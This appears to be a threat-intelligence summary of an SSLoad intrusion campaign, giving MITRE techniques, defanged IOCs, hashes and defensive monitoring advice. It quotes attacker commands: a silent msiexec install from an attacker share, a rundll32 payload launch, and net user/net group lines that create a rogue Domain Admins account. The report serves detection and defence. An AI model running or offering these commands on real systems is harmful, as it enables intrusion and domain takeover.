Keypoints
- Initial infection via phishing link that redirects from mmtixmm[.]org to a heavily commented JavaScript (out_czlrh.js) that launches further stages.
- JavaScript uses ActiveX, WMI, and drive-mapping logic to access a remote share and silently install an MSI (slack.msi) via msiexec.
- The MSI installs SSLoad components (DLLs in %APPDATA% and C:ProgramData) executed through rundll32, then beacon to HTTPS C2s and perform system/domain enumeration.
- Operators manually deploy a Cobalt Strike beacon which downloads and installs ScreenConnect (ConnectWise Control) RMM to maintain persistent interactive access.
- Attackers used PowerView PowerShell modules to enumerate shares and file servers, scraped browser-stored credentials and dumped LSASS to obtain a domain admin NTLM hash.
- With elevated credentials they created a service-like domain account (svc_mail) and added it to Domain Admins, achieving full domain takeover and persistence.
- Securonix recommends enhanced endpoint logging (Sysmon/PowerShell) and monitoring of staging directories like C:ProgramData and %APPDATA% for detection.
MITRE Techniques
- [T1059.007] Command and Scripting Interpreter: JavaScript – Initial execution used an obfuscated JavaScript file to start the chain (‘kicks off the code execution’).
- [T1047] Windows Management Instrumentation – Script accessed WMI for command execution and system interaction (‘GetObject(“winmgmts:.rootcimv2”)’).
- [T1218.007] System Binary Proxy Execution: Msiexec – Installer was executed silently to install slack.msi (‘msiexec.exe /i wireoneinternet[.][email protected] /qn’).
- [T1218.011] System Binary Proxy Execution: Rundll32 – SSLoad DLLs were executed via rundll32 to run malicious payloads (‘rundll32.exe “C:UsersappdataRoamingCustom_updateUpdate_4319e68c.dll”, homi’).
- [T1071.001] Application Layer Protocol: Web Protocols (HTTP/S) – Malware beaconed and sent collected data to HTTPS C2 endpoints (‘beaconing to two preconfigured C2 servers: hxxps://skinnyjeanso[.]com/live/ and hxxps://titnovacrion[.]top/live/’).
- [T1102] Web Service – Initial phishing redirect delivered a JavaScript payload via web links (‘phishing emails contain a single link which redirects from a mmtixmm[.]org URL to a single JavaScript file’).
- [T1219] Remote Access Software – Attackers installed ScreenConnect RMM to maintain interactive remote control (‘downloaded and installed a ScreenConnect RMM software instance’).
- [T1003.001] OS Credential Dumping: LSASS Memory – Credentials were extracted from LSASS to obtain a domain admin NTLM hash (‘extract credentials from LSASS, where they were able to obtain a domain admin account NTLM hash’).
- [T1069.002] Permission Groups Discovery: Domain Groups – Enumeration included querying domain groups and domain admins (‘net group “domain admins” /domain’).
- [T1078.002] Valid Accounts: Domain Accounts – Attackers created and used a domain service account and added it to Domain Admins (‘net user svc_mail pass1234@ /add /domain’ and ‘net group “domain admins” svc_mail /add /domain’).
Indicators of Compromise
- [Domain] C2 and staging domains – skinnyjeanso[.]com, wireoneinternet[.]info, and other domains used for payload hosting and C2.
- [IP Address] Cobalt Strike C2 IPs – 85.239.54[.]190, 23.159.160[.]88 (used as HTTPS connect URLs for Cobalt Strike traffic).
- [File name] Dropped installers/launchers – slack.msi, msedgeview.msi (MSI installers fetched and executed via msiexec).
- [File name / DLL] Payload DLLs and staging paths – %APPDATA%localdigistampmbae-api-na.dll, %APPDATA%Custom_updateUpdate_*.dll (executed via rundll32).
- [Hashes] Sample file hashes – out_czlrh.js (DB265EA1732935F61E8D0F7A20A8ADC54E20AF71B3CF4A737714CD3377C838F6), slack.msi (B9DBE9649C761B0EEE38419AC39DCD7E90486EE34CD0EB56ADDE6B2F645F2960), and 30+ other hashes listed in the report.
The technical procedure begins with a phishing-delivered redirect to a large, comment‑filled JavaScript (out_czlrh.js) that, once cleaned, creates ActiveX and WMI objects to enumerate drives and attempt network share mapping to wireoneinternet[.]info@80share. If a share is mapped the script silently runs an MSI via msiexec (e.g., slack.msi) to drop subsequent stages; if mapping fails it falls back to WMI-executed “net use” commands. The JavaScript’s primary purpose is reliable staging and silent installer execution, using heavy commented noise as an evasion technique that reduced apparent entropy and hid the 20 KB of meaningful code within an 835 KB file.
Executed MSI payloads install SSLoad components (DLLs placed in %APPDATA% and C:ProgramData) which are launched via rundll32, after which the implant beacons to HTTPS C2 servers (e.g., skinnyjeanso[.]com, titnovacrion[.]top). The malware runs extensive discovery (ipconfig/systeminfo/nltest/net/wmic/whoami), exfiltrates collected host and domain data over encrypted channels, and provides operator access. Operators then manually deploy a Cobalt Strike beacon (rundll32 executed), which communicates over port 443 to configured C2 endpoints and is used to download and silently install a ScreenConnect RMM MSI to provide persistent, interactive remote control.
With RMM in place, the intruders ran PowerView modules (Invoke-ShareFinder, Find-DomainShare, Get-DomainFileServer) via a local proxy PowerShell endpoint to enumerate network shares and servers, scraped browser-stored credentials, and used LSASS credential dumping to obtain an NTLM hash for a domain admin. They then added a service-styled account (svc_mail) and promoted it to Domain Admins (net user / net group commands), achieving full domain persistence and lateral control. Monitoring recommendations include process-level logging (Sysmon/PowerShell), watching staging directories (C:ProgramData, %APPDATA%), and network indicators for the listed domains and IPs.